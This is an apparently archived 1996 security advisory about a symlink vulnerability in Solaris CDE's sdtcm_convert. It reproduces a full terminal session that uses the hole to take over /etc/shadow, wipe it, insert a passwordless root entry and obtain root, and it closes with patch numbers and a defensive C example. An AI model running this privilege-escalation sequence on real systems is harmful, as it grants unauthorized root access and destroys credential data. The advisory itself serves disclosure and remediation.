COMMAND
/usr/dt/bin/sdtcm_convert
SYSTEMS AFFECTED
Solaris 2.5.1
PROBLEM
Adam Morrison <adam@MATH.TAU.AC.IL> found one other hole in
sdtcm_convert.
CDE is generally a can of worms.
$Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $
Script started on Thu Jul 11 22:15:03 1996
22:15 [wumpus:~] % whoami
adam
22:15 [wumpus:~] % ls -l /etc/shadow
-r-------- 1 root sys 291 Jul 11 22:14 /etc/shadow
22:15 [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
22:15 [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
Loading the calendar ...
WARNING!! Data will be lost when converting version 4 data
format back to version 3 data format.
Do you want to continue? (Y/N) [Y] y
Doing conversion ...
Writing out new file ...
Conversion done successfully.
Total number of appointments = 0
Number of one-time appointments converted = 0
Number of repeating appointments converted = 0
Number of one-time appointments pruned = 0
Number of repeating appointments pruned = 0
The original file is saved in /tmp/calorig.adam
22:15 [wumpus:~] % ls -l /etc/shadow
-r--rw---- 1 adam daemon 3114 Jul 11 22:15 /etc/shadow
22:15 [wumpus:~] % chmod 644 /etc/shadow
22:15 [wumpus:~] % cp /dev/null /etc/shadow
cp: overwrite /etc/shadow (y/n)? y
22:15 [wumpus:~] % ls -l /etc/shadow
-rw-r--r-- 1 adam daemon 0 Jul 11 22:15 /etc/shadow
22:15 [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
22:16 [wumpus:~] % su
# id
uid=0(root) gid=1(other)
# exit
SOLUTION
There is a set of Sun patches that corrects this vulnerability.
They are:
103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)
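
The session above shows sdtcm_convert following the planted /tmp/calorig.adam link and leaving /etc/shadow owned by adam. The following is an added example, not code from Sun or from the original post, of how a privileged program can save such a file in a shared directory without following a link; save_original, demo_symlink_refused and the /tmp/symdemo directory are hypothetical names.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper, not sdtcm_convert code: create dir/name for the
 * invoking user without ever following a link planted at that name. */
int save_original(const char *dir, const char *name, const void *buf, size_t len)
{
    char path[1024];
    if (strchr(name, '/') != NULL ||
        snprintf(path, sizeof path, "%s/%s", dir, name) >= (int)sizeof path)
        return -1;
    /* O_EXCL refuses any existing name, symlinks included (even dangling). */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    /* Change ownership and write through the descriptor, never the path. */
    int ok = fchown(fd, getuid(), (gid_t)-1) == 0 &&
             write(fd, buf, len) == (ssize_t)len;
    return (close(fd) == 0 && ok) ? 0 : -1;
}

/* Constructed scenario: calorig.demo is pre-planted as a symlink to a
 * read-only "victim" file. Returns 1 if the victim is left untouched. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/symdemoXXXXXX", victim[64], planted[64];
    struct stat before, after;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(planted, sizeof planted, "%s/calorig.demo", dir);
    int fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0400);
    if (fd < 0 || close(fd) != 0 || symlink(victim, planted) != 0) return -1;
    stat(victim, &before);
    int refused = save_original(dir, "calorig.demo", "x", 1) == -1;
    stat(victim, &after);
    unlink(planted);                      /* link gone: creation now succeeds */
    int created = save_original(dir, "calorig.demo", "x", 1) == 0;
    unlink(planted); unlink(victim); rmdir(dir);
    return refused && created && before.st_size == after.st_size &&
           before.st_uid == after.st_uid && before.st_mode == after.st_mode;
}

int main(void) { return demo_symlink_refused() == 1 ? 0 : 1; }
```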